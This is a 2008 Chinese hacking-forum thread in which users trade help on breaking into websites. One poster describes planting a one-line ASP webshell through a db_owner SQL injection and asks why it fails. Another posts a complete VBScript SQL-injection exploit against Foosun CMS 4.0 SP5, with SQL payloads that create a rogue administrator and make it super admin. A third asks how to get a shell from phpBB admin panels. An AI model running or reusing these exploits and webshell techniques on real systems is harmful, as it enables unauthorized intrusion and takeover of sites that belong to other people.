Board logo

标题: [讨论]入侵时遇到的阻碍 [打印本页]

作者: 虚竹    时间: 2008-7-20 18:02     标题: [讨论]入侵时遇到的阻碍

[讨论]入侵时遇到的阻碍
议题作者:落叶纷飞
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

刚在搞一个站,找到了一个db_owner的注入点,能列目录

找到WEB目录后,我马上备份了一句话到WEB目录

但是在备份出来的一句话却提示如下:

Active Server Pages 错误 'ASP 0116'

丢失脚本关闭分隔符

/admin/r.asp,行 66

Script 块缺少脚本关闭标记(%>)。

请问是不是过滤了“%>”啊?还是别的原因?该怎么解决啊?小鸡鸡重出江湖了~~!!
帖子119 精华0 积分3244 阅读权限100 性别男 在线时间143 小时 注册时间2007-7-31 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)


dingking
荣誉会员

作者: dongdg    时间: 2008-7-20 18:02

EST上貌似有过讨论的帖子。你自己找找看吧。~~昨天是明天的前天今天是昨天的明天明天是昨天的后天    ╰o╯╰o╯
帖子741 精华2 积分4784 阅读权限100 性别男 在线时间756 小时 注册时间2005-6-17 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 赚更多的钱

xyf1987
晶莹剔透§烈日灼然
作者: p-o-t    时间: 2008-7-20 18:02

兄弟,借个地方发帖求助。
我很菜啊。请教大家:
这样的代码如何编译利用??
引用:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem   风讯4.0 sp5[mssql] 注入漏洞测试脚本 By Tr4c3[at]126[dot]com
Dim strData, strUrl, strGetinfo, xPost
strData = "<body><userip>999.999.999.999</userip><email>body@baidu.com</email><action>checkname</action><syskey>b77c8e0d7a0784d5</syskey><appid>FoosunCMS</appid><username>'</username></body>"
strUrl = "http://demo.foosun.net/api/API_Response.asp"
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "POST", strUrl, False
xPost.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
xPost.SetRequestHeader "Referer", strUrl
xPost.send(strData)
'strGetinfo = xPost.ResponseText
strGetinfo = bytes2BSTR(xPost.ResponseBody)
Wscript.echo(strGetinfo)
Wscript.Quit
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem   将返回内容转换成简体中文
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem ';insert into FS_MF_Admin (Admin_Name,Admin_Pass_Word)values('Tr4c3','83aa400af464c76d')-- 添加一个普通管理员Tr4c3,密码12345678
Rem ';update FS_MF_Admin set Admin_Is_Super=1 where Admin_Name='Tr4c3'-- 把Tr4c3提升为超级管理员
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
帖子17 精华0 积分64 阅读权限40 在线时间19 小时 注册时间2006-5-24 最后登录2008-7-17 查看详细资料引用 报告 回复 TOP 软件项目外包

magickingdom123
晶莹剔透§烈日灼然
作者: 下眩月    时间: 2008-7-20 18:02

我也借个地方 兄弟
加急 各位大哥们  PHPBB2的后台 除了那个恢复数据的方法拿SHELL 还有其他的吗 ?如果用那个恢复数据库的方法 找不到路径怎么办  我访问那个DB下的文件也没有暴出来 还有就是PHPBB3 如何从后台拿SHELL啊 各位大哥 给点指教   谢谢啊  Q 764994885
帖子3 精华0 积分3 阅读权限40 在线时间0 小时 注册时间2008-7-15 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

坏苹果
晶莹剔透§烈日灼然
作者: idol77    时间: 2008-7-20 18:02

遇到过这样的情况。。
MS是备份一句话的时候
  把后面的一些%>给过滤了。。。反其道而行之

帖子11 精华0 积分19 阅读权限40 性别男 在线时间7 小时 注册时间2008-3-26 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 软件项目外包

angel
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2